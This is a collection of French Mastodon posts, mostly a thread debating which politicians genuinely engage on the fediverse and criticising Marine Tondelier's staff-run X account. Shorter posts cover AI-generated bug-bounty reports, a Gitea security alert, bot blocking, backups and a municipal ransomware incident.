Tiens, et si on listait les personnalités politiques qui s’expriment sur Mastodon ? Pas juste un copié-collé de leur compte X, pas juste un compte en écriture seule, mais des gens qui interagissent réellement ici ?
Côté Écologistes (la formation dont je me sens le plus proche, malgré des réticences [gniiiiii]), il y a @cyrielle_chatelain et @Greguti que je lis très régulièrement, et qui disent plein de choses pertinentes sur les communs numériques.
Boosts appréciés pour faire grandir la liste.
@antoinechambertloir @fabi1cazenave @SarahPersil nous fait de super compte rendus de nos conseils régionaux, répond même quand c'est pas sa délégation et : merci à toi Sarah !
@ffeth @antoinechambertloir @SarahPersil
De fait, son contenu a l’air top ! Par contre je n’ai pas l’impression qu’elle interagisse ? Je mets peut-être la barre trop haut en espérant plus que des publications ?
Côté élus locaux, écolos mais pas affiliés à ce parti, à #Grenoble on a @Gilles_Namur qui fait un boulot incroyable ! Il y a aussi @abkgrenoble, @SimonBillouet, @pierremeriaux, @FabienMalbet… j’en oublie sûrement.
@fabi1cazenave @antoinechambertloir @SarahPersil
si si !
Peut être pas avec les grenouilles bauloises ou les Grenobloises
@fabi1cazenave
Sarah interagit un peu oui
@ffeth @antoinechambertloir @SarahPersil @Gilles_Namur @abkgrenoble @SimonBillouet @pierremeriaux @FabienMalbet
@niavy @fabi1cazenave @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet @pierremeriaux @FabienMalbet on fait ce qu'on peut (même en vacances!)
@fabi1cazenave @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet on peut toujours faire mieux, clairement. Je ne suis pas la plus active mais j'essaie de produire du contenu argumenté et de répondre.
Il y a bien longtemps, je publiais mon agenda hebdomadaire, mais ça demande bcp de boulot (nous sommes nos propres collab).
🤔D'où ma question ouverte: vous attendez quoi de la communication d'un.e élu.e sur Mastodon? Fréquence, contenu,...?? Merci!!
@SarahPersil @ffeth @antoinechambertloir @abkgrenoble @SimonBillouet Difficile à quantifier, mais concernant le travail d’élu’es, je dirais que ce que fait @Gilles_Namur est très bien : il poste un message quand quelque chose a avancé, il répond dans la semaine aux éventuelles questions, c’est top. (Et je sais bien qu’il a infiniment plus d’activité sur X qu’ici, donc c’est vivement apprécié qu’il prenne le temps.)
@SarahPersil est-ce que tu es prête à une avalanche de réponses ? (Puis-je repouéter ta question ? Je comprendrais fort bien que non :-)
Je vais y réfléchir si j'arrive à réfléchir
@fabi1cazenave @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet
@ffeth @fabi1cazenave @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet repouet et reflechissage appréciés! Les questions, cey la vie, et X, c'est le Mal!
@SarahPersil @fabi1cazenave @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet
Du bottom up ! Sur Mastodon comme hors ligne. C'est ce que j'attends d'un élu ou un élue, qui ,rappelons le trivialement, est mon employé.
Vous pouvez transmettre à @marinetondelier .
@loicgervais Les élu’es ne sont pas nos employé’es mais nos représentant’es. La quasi-totalité des élus locaux font ça en plus de leur emploi, et sont dédommagés de leur travail par des indemnités très inférieures au taux horaire de leur emploi. Je les vois surtout comme des contributeurs et contributrices.
@SarahPersil @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet @marinetondelier
@fabi1cazenave @loicgervais @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet @marinetondelier merci! Mais c'est vrai que j'aime aussi bien l'image des citoyen.nes qui sont mon employeureuse, image que j'utilise souvent ne serait-ce que pour bousculer les représentations et remettre tout le monde à sa place. Je suis admirative de l'investissement des élu.es locaux, en mairie, à la comcom, au syndicat des eaux et autres, avec des compétences en droit de l'urbanisme etc pour une indemnité légère.
En tant que VP de Région (même rurale), je gagne cependant suffisamment bien ma vie pour m'y consacrer à fond.
Sur quelle forme le bottum up?
@SarahPersil @fabi1cazenave @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet @marinetondelier
Je ne sais pas si vous êtes majoritaire ou minoritaire dans votre région, mais il est fort à parier que c'est l'abstention qui a gagné ici comme ailleurs.
Il y a pas de recette miracles, il faut faire du "aller vers" comme on dit maintenant. Limite du "vis ma vie".
les politiques publiques sont le plus souvent écrites par de gens qui ne sont pas concernées par leurs effets.
@SarahPersil
Je m'incruste dans la conversation : Robert Reich a décrit comment la campagne de Kamala Harris avait visé à démontrer aux gens ce qu'il faut penser, alors que celle de Zohran Mamdani (et celle de Barak Obama avant lui) est réellement partie des problèmes des gens. (Comment a-t-il su en faire un programme politique général ? — c'est son talent et son savoir...)
@fabi1cazenave @loicgervais @ffeth @Gilles_Namur @abkgrenoble @SimonBillouet @marinetondelier
@fabi1cazenave @SarahPersil @ffeth @antoinechambertloir @Gilles_Namur @abkgrenoble @SimonBillouet @marinetondelier
vous aurez noté que j'ai précisé "très trivialement" qui indique que ce n'était pas à prendre au pied de la lettre.
Pour nous représenter cela demande a minima de nous écouter.
@fabi1cazenave Moi j’aimerais bien qu’il y ait François Ruffin qui vienne, pour qu’on puisse interagir avec lui. 😐️
@fabi1cazenave Il y a aussi @marinetondelier.
@Sylvhem @marinetondelier Je ne l’ai pas citée, parce qu’elle n’interagit (quasi) pas ici. Et c’est son équipe qui gère le compte (copié/collé de X/Twitter).
Dans le même esprit il y a @sandrousseau, qui a aussi un bridge BlueSky @sandrousseau.bsky.social.
@fabi1cazenave Autant pour moi. Je l’ai déjà vu répondre à des gens, mais ça devait être une rare interaction.
@Sylvhem On a eu un échange avec son équipe hier. C’était… pas ce qu’on espérait, d’où le fait que je cherche à élargir la liste. 😅
Je mets peut-être la barre trop haut en cherchant des gens qui ont une vraie activité ici.
@fabi1cazenave
Bonne initiative, j'en découvre, merci !
J'essaie de mobiliser les élus d'Essonne et d'ailleurs X)
@fabi1cazenave @cyrielle_chatelain @Greguti bonne question.. quoique je n'ai pas de compte x ou instagram.. c'est ridicule de courir d'un à l'autre pour se faire.. voir ou lire, que sais je..Par contre un politicien qui participe de manière concrete aux propos, cela n'existe pas..
@fabi1cazenave @cyrielle_chatelain
Parmi les élu·es #LesEcologistes qui postent régulièrement sur Mastodon nous avons aussi @LisaBelluco @marinetondelier @sandraregol @SarahPersil ou encore @MaximeMessier
J'entretiens une page de mon site avec les comptes écolos créés... (mais beaucoup ont juste testé quelques semaines et sont repartis, hélas).
https://www.gregorygutierez.com/doku.php/linux/comptes-mastodon
@Greguti @fabi1cazenave @cyrielle_chatelain @LisaBelluco @marinetondelier @sandraregol @SarahPersil @MaximeMessier et vraiment Greg merci de ta patience et de ce travail de fourmi !
@fabi1cazenave @cyrielle_chatelain @Greguti @raphaellerl
Raphaëlle Rémy-Leleu
qui est très bien et interagit (pas juste communique) sur Mastodon.
@tekhne @fabi1cazenave @cyrielle_chatelain @Greguti c’est gentil merci :) c’est « marrant » d’ailleurs, en tous cas j’y réfléchis beaucoup, cette mise à distance des politiques. Il y a quelques années, alors que j’étais militante sans mandat, je tapais la discute sur les RS. Maintenant je communique et j’interagis (même en étant à nouveau sans mandat !)
@fabi1cazenave j'essaie désespérément d'en trouver hors de la sphère "écolos et alliés", et ... rien.
Y'en avait quelques-uns, visiblement les comptes existent toujours mais sans contenu.
@Gallorum Des écolos locaux qui ont un compte et ne l’alimentent pas, y en a quelques-uns aussi. Dommage.
@fabi1cazenave @cyrielle_chatelain @Greguti c'"est bizarre cette envie d'etre proche de qq , a un moment de vie.. etre proche d'un écolo après les incendies, les si et la, est une recherche de soi meme... des canicules, des immigrés, des politiciens véreux, il y a en aura toujours.. Si certains politiciens hurlent et attirent les plus faibles face à une situation acutelles, je dis stop.. c'est utiliser un faible pour sa gouvernance.. dans 6 mois il y aura d'autres problèmes
@fabi1cazenave @cyrielle_chatelain @Greguti perso, je suis vice-presidente de la Région Bourgogne Franche-Comté, en charge des jeunesses, de la vie associative et de la démocratie participative.
Au delà de mes quelques publications, j!essaie de live poueter les assemblées pleinieres du Conseil Régional, tous les 3 mois! Et oui, merci @Greguti pour nous avoir sensibiliser puis former Mastodon!
@fabi1cazenave
du côté de Lyon il y a Bruno Bernard https://piaille.fr/@BrunoBernard
mais il serait bon qu'il mette sa présentation à jour puisqu'il n'est plus président de la Métropole... ce qui me fait penser que ce n'est pas vraiment lui qui anime ce profil et que ses interactions sont rares pour ne pas dire inexistante 😐
bonjour à celui juste à côté de moi dans ce TGV qui a un sticker "antifascist fediverse" sur sa gourde
RE: https://mamot.fr/@HypathieBlog/117055365148602684
« un poil »
kazé a repartagéBeau coup de Marine Tondelier qui a touché un nerf du mogul aux 280 millions d'abonnés, en demandant le blocage en France de la plateforme d'Elon Musk, qui lui a... répondu !
A ceci près tout de même que Marine Tondelier ne renonce pas à son compte X, ce qui est un poil faux-cul.
Pour avoir une idée de la taille du poil :
https://mamot.fr/@Gallorum/117048471912360430
@fabi1cazenave « À titre personnel je ne touche pas à la grosse pile de fumier, j’envoie les gens que j’emploient nager dedans à ma place » n’est pas la take qu’elle a l’air de croire que c’est…
@ashiel « J’ai renoncé à la voiture, j’ai un chauffeur qui m’emmène partout ».
#ParleCommeTondelier
@ashiel Et si tu penses que la réponse de son community manager va relever le niveau : détrompe-toi. Lunaire. J’ai pas les mots.
https://piaille.fr/@marinetondelier/117050797797692180
@fabi1cazenave Je ne m’attendais à rien et je suis quand même déçu
Pareil... Ce monde est un peu plus affligeant chaque jour, on va manquer de qualificatifs et de superlatifs d'ici peu...
@isaaac @ashiel @fabi1cazenave Pour certains cas il faudrait inventer des "sousperlatifs", franchement...
@tcharack @isaaac @ashiel
Ce qui me rend fou, c’est le décalage qu’on voit tous les jours entre certaines personnes qu’on côtoie dans nos milieux militants — compétentes, pertinentes, motivées, sincères — et celles qui nous représentent pour une élection comme la présidentielle. Comme s’il y avait un filtre, qui ne laisse passer que les manipulateurs. Marre.
est ce que dans le cadre d'une élection nationale ou l'enjeu semble important, on peut se permettre de se privé d'un canal de communication ?
avec le risque de perte de visibilité?
bref, je serais le premier a applaudir quand elle clôturera son compte X, en attendant elle au moins a un compte sur le fediverse qui répond et interagi...
Quelle autre personnalité politique a un compte actif sur le fediverse ? (vraie question...)
@oldsysops @fabi1cazenave @tcharack @ashiel
Pour moi, un compte actif, c'est quand on prend le temps d'être soi, avec ses doigts,
Pas quand on passe par une équipe de regie de communication,
Mais je dois être un peu trop boomer blanc mâle cisgenre.
@oldsysops
T'inquiète, vu l'etat du pays, de l'ambiance, du moral, des promeeses non tenues, des alternatives normées,
je pense que eux non plus n'y comprennent rien à la politique et à la comm'...
@fabi1cazenave @tcharack @ashiel
@oldsysops @tcharack @isaaac @ashiel
Oui, chacun décide s’il veut publier sur X, bien évidemment.
Je pense que les gens de gauche ne devraient pas, parce que l’algorithme version Musk va les livrer à la horde de nazis et de bots, et que in fine, ça ne sert qu’à légitimer une propagande fasciste ; mais ça n’est que mon avis, chacun fait comme il l’entend.
Par contre : annoncer « quitter X » parce que c’est son équipe qui gère le compte… Non, vraiment, y a rien qui va.
@oldsysops Et oui, elle a un compte sur le fedivers, mais qui n’est là que pour relayer la bonne parole. Va voir le nombre de réponses sur les trois derniers mois.
Si on cherche quelqu’un de sincère et compétent dans la même formation politique, il y a @cyrielle_chatelain ici — et vraiment ici (= elle y interagit).
Mais encore une fois : ce qui me choque, c’est le fait d’annoncer « quitter X » et de fustiger le réseau… alors qu’elle missionne une équipe pour ça.
et merci d'avoir pointer @cyrielle_chatelain@piaille.fr, je la rajoute dans ma liste des comptes à suivre !
@fabi1cazenave @oldsysops @tcharack @isaaac @ashiel
Marine n'a absolument pas annoncé "quitter X" comme tu l'affirmes.
On lui demande si c'est le cas, elle répond qu'elle a désinstallé l'appli et laisse son équipe gérer.
Cette réponse peut ne pas te convenir, on l'a compris, mais ça ne te donne pas le droit d'inventer des faits.
Annoncer qu'on quitte X, c'est faire un post dessus/donner une interview pour dire qu'on ferme son compte.
De facto, elle n'a jamais fait ça ni dit qu'elle fermait son compte X quelque part.
Signé le CM qui a l'air de t'énerver, mais l'honnêteté est la base si on veut pouvoir échanger Fabien.
@marinetondelier @fabi1cazenave @oldsysops @tcharack @isaaac @ashiel faut quand meme être un peu maso pour continuer a alimenter un compte X en tant que femme politique de gauche et écologiste, les torrents de boue (pour rester poli) que vous vous prennez dans les coms sous vos posts c'est quelque-chose, vous pensez avoir quel genre de relais sur ce réseau ? Les journalistes saurons vous trouver si vous ne postez plus la bas, quand a votre base électorale elle n'y est déjà plus.
@marinetondelier
Annoncer vouloir bloquer X, se faire relayer dans les mass medias, et ne pas vouloir clore son compte, quel manque profond de congruence...
Et laisser son equipe de comm' defendre une position non congruente bec et ongle, c'en est attristant.
Pouvons-nous vous proposer de relayer à Mme Tondelier la suggestion de bon nombre d'entre nous : et si Marine Tondelier passait à l'acte, et annonçait publiquement quitter la centrale publicitaire néo-nazi de l'étron musqué, en actant à la face du monde que ce site n'est pas fréquentable ?
Il y a tous les arguments pour… quels sont les argumemts contre ?
@fabi1cazenave @oldsysops @tcharack @isaaac @ashiel un compte personnel et un compte d'orga sont 2 choses très différentes.
Je ne comprends pas non plus ce besoin de vouloir à tout prix personnifier le pouvoir, surtout chez EELV. ça me dépasse, on est très loin de la culture collectiviste (et ce que l'on retrouve partout dans la polFR, c'est usant)
On est bien d'accord que Marine Tondelier n'est pas une organisation ?
@fabi1cazenave @oldsysops @tcharack @ashiel
@isaaac @fabi1cazenave @oldsysops @tcharack @ashiel oui c'est mon propos. Dire "faut garder une présence sur X en tant qu'orga" et garder une présence avec son compte perso, ça n'a rien à voir. Et garder son compte perso, bah ça craint, c'est pas justifiable en fait, à part avoir peur de perdre ses abos...
@fabi1cazenave
Ben... Il y a un filtre.
Comment réussir en politique sans être adossé à un parti ? Comment monter dans la hiérarchie de ce panier de crabes sans être très (très) ambitieux et pas trop étouffé par les scrupules...
Bref, le filtre favorise grandement les mégalo psychopathes.
@tcharack @isaaac @ashiel
@Badmax Je vois beaucoup de gens très bien qui militent activement pour un parti. Ce que je regrette, c’est que ce sont systématiquement les plus toxiques que l’on récompense avec une investiture, un poste salarié, un rôle de coordination, etc. Les narcissiques s’imposent, les âmes pures s’effacent.
@fabi1cazenave
Ben oui. Pas d'ambition, pas de montée. On ne récompense pas la compétence. C'est aussi assez vrai en entreprise.
Ceux qui sont en mesure de nuire monte davantage.
@tcharack @isaaac @ashiel
#Dunkerque
@oldsysops ouch' !! 😱
C'est quoi ? 🤔
bref, si vous pouvez, merci de signer cette pétition
https://www.change.org/p/rania-doit-rester-en-france-pour-y-devenir-docteure-en-m%C3%A9decine
alors ok, il faut quitter X, mais en attendant on ne pourrait pas plutôt valoriser la présence sur le fediverse plutôt que de critiquer le non départ de X ?
@oldsysops j’avais fait une liste : https://fourbi.eu/billet/2026-01-10-lettre-a-mon-maire-qui-poste-encore-sur-x-twitter#:~:text=Ajout%20le%2010/01%20au%20soir
@oldsysops c'est qui cette personnalité ?
@registurner @oldsysops j'imagine qu'il s'agit de @marinetondelier vu l'actualité et le bashing sur X
Les rapports de faille de sécu générés par IA, c'est l'enfer, maintenant ils sont valides et adressent des vraies failles… sauf que tu en reçois une trentaine dans la semaine… Au secours !
@oldsysops
C'est un indien il m'avait déjà contacté ya 2 ans pour une vulnérabilité facilement trouvable, écrite en anglais approximatif. Là il me sort 4 ou 5 vulnérabilités par jour. Des pages et des pages d'explications avec plein de bullet points en parfait anglais... On a un programme de bug bounty. Donc les gens tombent dessus. J'ai jamais réussi à nous inscrire a un truc type hackerone ils demandaient des dizaines de milliers de dollars juste pour s'inscrire...
@oldsysops
La motivation c'est les sous. On lui a versé 3000 euros pour une vingtaine de failles là. Dont des trucs très malins qu'un humain mettrait des jours ou des semaines à trouver... Je ne connais pas le modèle employé non ni le coût mais ça doit être assez faible. Techniquement le truc est très bon. Il comprend vraiment très bien les arcanes du code. Donc peut-être l'humain derrière le guide bien... En tout cas le gars semble bien comprendre le sujet des failles.
@oldsysops
Juste un humain ne peut pas trouver autant de trucs aussi vite. Surtout en anglais sur un logiciel en français avec plein de commentaires en français et un langage de programmation custom...
@oldsysops
Ça me fait très chier de devoir gérer ça mais c'est des vraies failles, les rapports sont très complets et ça aurait coûté 10 fois plus de les trouver par un audit... Donc c'est pas si mal pour notre petit budget mais bon c'est plutôt stressant de se dire qu'un gars comme ça peut trouver autant de failles en si peu de temps... :-/
@oldsysops Si ça t'intéresse je peux te forwarder un report par mail pour que tu vois à quoi ça ressemble.
@bohwaz Summer of bliss 🫶
https://daniel.haxx.se/blog/2026/06/15/curl-summer-of-bliss/
Offre d’emploi – Coordinateur.rice de l’antenne de Grande-Synthe spécialité Plaidoyer et communication
https://utopia56.org/offre-demploi-coordinateur-rice-de-lantenne-de-grande-synthe-specialite-plaidoyer-et-communication/
"Employeur : Utopia 56 Types de contrat : CDI Horaires : temps plein avec travail régulier en soirée et le week-end / système d’astreinte partagée entre les 3 coordinateur.rices. Rémunération : Utopia 56 applique une politique salariale transparente visant à reconnaître
Elle a osé le dire: "J’ai à titre personnel désinstallé l’application, oui, déclare Tondelier à propos de son utilisation de X, précisant: "J’écris mes posts mais je laisse mon équipe les publier. Politiquement, c’est impossible d’être absent de X car nous en sommes tous devenus dépendants", assure la patronne des écolos qui appelle à l'interdire en France. Commencer par ne plus l'utiliser du tout serait un premier pas...
#Politique #Tondelier #Musk #X #Twitter #SocialMedia #Presidentielle
@paul_denton mouai... elle avait déjà tenu une position plus que nulle au moment de #HelloQuitteX
Sur ce créneau je suis surpris par comment elle parvient à un mélange de propos sensés et de conneries.
@paul_denton
Avoir plusieurs téléphones peut éventuellement être une solution pour la vie privée, mais ça ne sera jamais une solution de boycotte d'une plateforme !
@paul_denton Clairement. Si les politiques se barrait de ce réseau de m... super toxique ? Ce serait la moindre des choses.
@paul_denton je trouve cela sévère tout de même. Elle est une des rares personnalités politiques à communiquer systématiquement sur mastodon...
@mbuzzoni
Pareillement. Je suis d'accord avec la critique mais c'est je crois la seule d'envergure national à poster sur Mastodon (sans être un bot).
@paul_denton
@paul_denton @kgaiji @mbuzzoni X enferme ses utilisateur.ices dans une bulle. Ça amène à des dingueries comme utiliser Grok (sans esprit critique, ça cause même des visuels reprenant des codes antisémites) ou suivre des comptes très problématiques.
On regrette bien sûr que les Écologistes se sentent obligé.es de rester sur X, mais c'est dommage de ne pas reconnaître que c'est le seul parti à ne pas faire de X la référence et à être présent sérieusement sur Mastodon (bien sûr, on peut et doit encore faire mieux)
@eelvpoissy @paul_denton @kgaiji @mbuzzoni
1. Demander l'interdiction de X tout en y restant par CM interposé, c'est incohérent et passablement hypocrite.
2. Cela dit, EELV et Tondelier sont sur Mastodon et c'est tout à leur honneur. Contrairement à tous les autres partis, y compris LFI. Mélenchon avait même traité d'idiots ceux qui ont quitté X lors de la campagne #HelloQuitteX ! Comme quoi on peut avoir créé un Institut La Boétie et se complaire dans la servitude volontaire...
3. Tondelier est sur Mastodon ... mais ne supporte pas la critique. C'est la seule personne qui m'a bloqué sur Mastodon.
@marugil @eelvpoissy @paul_denton @kgaiji @mbuzzoni
Bompard est sur Mastodon (il y en a peut-être d autres)
@vanes49000
Bizarre. Je n'ai vu que des bots de X. Le seul compte pas bot est inactif.
@marugil @eelvpoissy @paul_denton @mbuzzoni
@kgaiji @vanes49000 @marugil @eelvpoissy @mbuzzoni bonjour, on avait déjà eu cette discussion ici et Manuel Bompard n'est pas actif sur Mastodon, ce n'est qu'un compte bot
@paul_denton
Oul, sincèrement, il y a peu de mondes. C'est dommage car Mastodon est la seule vraie alternative aux médias sociaux publicitaires et capitalistes. Il va falloir continuer à batailler pour qu'iels changent de pratiques. ✊
@vanes49000 @marugil @eelvpoissy @mbuzzoni
Légèrement absurde, mais ça suffit à faire réagir musk
https://www.franceinfo.fr/politique/marine-tondelier-s-en-prend-a-la-plateforme-x-et-ecrit-directement-a-elon-musk-apres-un-message-agace-du-milliardaire_8137658.html
@jaiecoute Tu parles, c'est vraiment le combat pour la galerie, ça fait pas avancer les choses... Pendant ce temps-là, on ne parle pas urgence climatique. Bref...
@paul_denton politiquement rien ne devrait être impossible. C'est l'essence même de la politique de rendre l'impossible possible.
@paul_denton Je serais un politicien de droite, je me regalerais : "Ah on reconnaît bien ces hypocrites de bobos ecolos, du genre à prôner l'interdiction de l'avion juste avant de partir en WE aux Seychelles. Qu'ils commencent à s'appliquer leurs dogmes autoritaires avant d'enlever leur liberté d'expression aux Français".
😱😵
@paul_denton Faites ce que je vous dis mais pas comme je fais, et on se demande pourquoi plus personne ne veut aller voter...
Ils sont tous pareils menteur , voleur ,usurpateur de la pire espèce, ils sont responsables de tout ce qui va mal dans notre pays.
a repartagé@paul_denton Les RS n'ont jamais fait changer les gens d'opinion politique, dès lors, il n'est aucun intérêt à rester sur le réseau de l'ennemi... sauf si ce n'est pas vraiment un ennemi. Tondelier étant une bourgeoise macroniste-compatible... elle a des raisons de rester sur X, le réseau de la bourgeoisie néofasciste..
Qu'elle publie aussi sur masto ne change rien à sa nature, c'est juste un moyen de brouiller les cartes sur sa personnalité.
> « Politiquement, c’est impossible d’être absent de X car nous en sommes tous devenus dépendants »
1. Je ne suis donc pas dans ce « nous » (et beaucoup d'entre vous, lecteurs, non plus, j'imagine…)
2. Je ne comprends pas : s'ils avaient vraiment confiance dans leur aura, ils n'utiliseraient QUE Mastodon (ou autre plateforme éthique) et les journalistes, donc les médias, donc les gens, viendraient les lire là !
@paul_denton Trump publie beaucoup plus sur truth.social que sur X, et les media vont le lire où il publie. Si une dizaine de personnalités de gauche significatives quittaient X pour mastodon, les média les suivraient, au moins par obligation. Et perdre les gens qui refuseront de suivre ailleurs que sur X, est-ce une grosse perte ? Est-ce leur public ? Vouloir transformer la société et ne pas réussir à convaincre d’installer une autre application…
@paul_denton Je pointe le flingue mais je laisse mon équipe appuyer sur la gachette. L'hypocrisie à son paroxysme. Ca se voit, @marinetondelier
@paul_denton Et c'est une accro de l'extrativisme.
Moi je suis accro a la saucisse blanche alsacienne et le flamenkuche qui me manque tant en Auvergne!
@paul_denton Et comment on fait nous ??? On se porte très bien sans X, il faut assumer ses positions … #tondelier
@paul_denton Le principe de fait ce que je te dis, sans que moi je le fais.. Interdire?? Et si je vous disais de faire reboot? Savez vous qu'aucunes lois n'obligent les parents a acheter un smart ou ordi a leur enfants pour faire leurs devoirs.On vous oblige à . A partir du moment ou vous etes dans votre bon droit, rien ne vous oblige à éduquer votre enfant dans l'ère technologique.On a échoués en 2002. dans l'espoir que vous maintenant y arriver. X?? lol je n'aime pas Musk
Chagé.e du SIGB.
Notre admin sigb part à la retraite, nous recrutons donc la personne pour prendre sa suite ! La prise de poste sera pour janvier 2027.
https://www.montpellier.fr/offres-d-emploi/charge-du-sigb-et-de-la-donnee-fh
#Conversations_im is now available for free on Google Play until August 18th.
Whenever there is a conference with a strong #XMPP presence, I like to make the app available for free to make it easier for attendees to install the app and give XMPP a shot.
I'm attending #FOSSY and #FrOSCon this weekend and next.
https://play.google.com/store/apps/details?id=eu.siacs.conversations
Tiens, #gitea est vulnérable à une grosse CVE avec un score de 9.8thehackernews.com/2026/08/critical-gitea-flaw-let-unauthenticated.html Les liens sur le site sont pas encore à jour, la version 1.27.1 de gitea est disponible ici : Admins : A VOS PATCHS !
Quelqu'un aurait "Le ministère du futur" en audiobook français ?
Boost ok, pas trouvé sur C411
Are you a sentient human being?
| Yes: | 1 |
| No: | 1 |
| Unfortunately: | 34 |
Bonjour,
En raison de nombreux robots engendrant un trafic toujours plus important sur #diaspora-fr, j’ai décidé de couper les accès en HTTP 1 au site. Cela n’impacte pas les navigateurs modernes, mais peut poser des pb avec la fédération vers #friendica par exemple, ou avec les bots RSS qui récupèrent les flux de #diaspora. Dîtes-moi si vous rencontrez des soucis dans les jours qui viennent.
En espérant que le serveur soit à présent mieux accessible, dsl pour les coupures de ces derniers jours.
Mais pourquoi tous ces robots ? On est sous surveillance ?
Courage pour améliorer la situation 🤞
@Gornthorn des robots qui aspirent le contenu des sites, majoritairement pour entraîner des IA. Il est devenu presque impossible d'héberger des services en ligne de nos jours, sans se cacher derrière des remèdes parfois pires que le mal (salut CloudFlare, je ne t'utiliserai pas).
@oldsysops c'est juste que la majorité d'entre eux se connecte en HTTP 1.1. Ce n'est évidemment pas une solution très "propre" puisqu'on exclue du trafic légitime, mais j'avoue être à court de solutions. Hors de question pour moi de me cacher derrière un Anubis qui ralentirait les visites de tous, et encore moins un Cloudflare américain qui verrait passer mes visiteurs. Si qq a d'autres idées pour bannir les milliers de requêtes faites par groupe de 16 avant un changement d'IP...
Vous êtes quelques personnes à m'avoir suivie quand j'ai recommencé à parler de dev alors par soucis de transparence je me dois de vous préciser ceci : j'y connais rien c'est pas mes études c'est pas mon métier j'ai pas prévu que ça le devienne je suis juste une pétasse sous fedora avec un thinkpad de 2016 et un rêve globalement
@oracle La loi et le règlement peuvent comporter, pour un objet et une durée limités, des dispositions à caractère expérimental.
@oracle ce sentiment quand les gens rejoignent après un truc un peu cool mais que tu sais que le prochain post est à ton niveau habituel de rien à faire 😐
@NemoJmeno je suis choqué déçu que vous ayez ce genre de craintes vous là les deux qui étincelez parmi les joyaux de la TL
@ffeth @NemoJmeno c'est parce qu'on est pas des joyaux on est deux bouts de charbon dans un barbecue on se sent pas super spéciaux juste on grille des poivrons quoi (je sais pas où je vais avec ça je veux juste manger des brochettes)
et en plus ca permet a plein de mecs blancs barbus d'étaler leur sciences à peu de frais en répondant à des toots ou tu te poses des questions ( j'ai déjà du faire çà...).
bref, continue à poster ce que tu veux, comme tu veux et ceux qui seront déçu se désabonneront.
note : en tant que sysadmin, je n'aurait pas énormément de conseils à donner, je laisse la place à d'autres.
@oldsysops c'est quoi le rôle d'un sysadmin ? Tu gère un parc de machines et le réseau sur lequel elles sont ?
We have switched to using https://pgBackRest.org for backups of our primary database 🗄️, covering both #PostgreSQL base backups and WAL archives. This has allowed us to optimise the weekly planetfile-generation pipeline 🌍, these weekly exports will now be published earlier in the week. A big thank you to the #pgBackRest team for a great product! 🙌
Comment on fait pour protéger au mieux un site des IA en fait ? Je dois y penser maintenant pendant la conception ou bien ça vient après en mode finition ?
@oracle le meilleur truc que je connais c'est iocaine https://iocaine.madhouse-project.org/
Mais avec les trucs que j'ai vu passer récemment sur la fausse font qui est en fait un JavaScript qui change le texte et est pourri pour les lecteurs d'écran, je me demande si iocaine pose aussi des problèmes d'accessibilité pour ces utilisateurs.
@LisaBanana oui y a @Saladeuh qui avait l'air de dire que c'était naze tous ces trucs là
@oracle @LisaBanana iocaine ne pose pas de soucis d'accessibilité il me semble. D'expérience , là où les solutions du genre cassent les lecteurs d'écran, c'est soit quand ça modifie directement le contenu de la page (typiquement si le texte est pas sélectionnable/copiable c'est mort). Soit quand ça met un challenge à l'entrée infaisable (genre un capcha visuel sans alternative audio).
Hi all and especially the amazing Linux and more specifically, Linux Mint people who could possibly help me out once again.
As always, the various search engines are coming up with everything I don't need help with.
I have a 2TB external drive which is in 3 partitions. I can see all the existing files and folders. However, I am backing up some music folders onto it and here is the issue. The backed up folders are not visible and after copying IDK, about 20+ folders, I get an error:
Error creating directory /media/rose/WD Passport/Music/BLUES: Input/output error
I tried Disks and GParted to fix but no use. I'm trying to run fsck on it but am failing as it won't accept my bloody password even though I use it all the time (of course!). If I try to re-copy one of the folders I get the usual message asking what I want to do with it (merge etc) and with most, I can then replace/skip etc. So it's sounds like a bad sector or something, hence the disk utils and fsck. There's plenty of space left on it, about 1/2 TB.
Any / all offers of help will be happily put to the test.
@oldsysops Ahhh, very true, will try that.
@oldsysops nothing but there is obviously something. Grrrrr
Shows all directories as inode but I think you're right. In root terminal there is nothing what so ever in the directory when listed but I cannot delete it either as it's not empty. Copying eitheranually (command line) or drag and drop doesn't work to this or other directories. Initial listing in disks and gparted claim it's an NTFS file system but drilling down a little further it is showing as a windows file system so I'm going to guess that it could simply be that weird old file system you mentioned.
I have a pc with a spare 2TB so am filing everything off the external drive, will do a load of house keeping to de-duplicate etc and reformat the drive and start again, keeping the files on the PC until I know the WD drive is stable.
2026: je me suis enfin mis aux sauvegardes distantes. Jusqu'à présent, j'en avais 2 locales avec borgbackup: sur un disque interne et sur un disque en USB (stocké dans une autre pièce).
J'ai pris Hetzner, offre Storage Box. 1To pour 4€/mois, avec support de Borgbackup (chiffré). 1ère exécution: en 8h, à « seulement » 18Mo/s, alors que ni mon CPU, ni mon disque source ni ma bande passante ne sont saturés. Bon, en ADSL ça m'aurait pris 60j.
Le mieux c'est un copain qui héberge tes backups et en échange t'héberges les siens. Un vrai tiers de confiance.
Putain un ransomware au niveau de la mairie.
Pas de panique. Pas de panique.
Pas de panique.
😱😱😱😱😱
@nicosomb Backups ?
Bon courage, on a eu ça à gérer plusieurs fois en tant que presta. C'est pas les meilleurs moments de ma carrière.
Voici ce qu’on a pour l’instant
https://www.ransomware.live/id/d3d3LnZpbGxlLXJpbnhlbnQuZnJAa3J5Yml0
Je ne sais pas quoi en penser.
Officiellement, pas de demande de rançon.
Pas d’extrait de données pour valider leur comm.
Mais la gendarmerie à l’échelle nationale vient de nous écrire pour dire d’être vigilant.
Le mail de la gendarmerie
@nicosomb
162 Go de données ? Qui concernent Rixent ?
(Troll à art, j'expère que c'est un fake. Vérifie quand même que les adresse ne sont pas écrites avec certaines lettres en cyrillique…)
Certain-es pourraient se documenter sur le groupe qui nous menace et voir si ça semble crédible ?
@nicosomb Ils sont actifs depuis quelques mois et ont compromis pas mal de monde. Leurs cible semblent super aléatoires:
CNIL prévenue et plainte déposée cet aprèm.
Je ne donne pas toutes les infos ici … mais bon, on ne m’a pas tout dit y’a 10 jours quand on a eu un souci informatique.
@nicosomb tes services ne t'ont pas tout dit, ou bien un presta ?
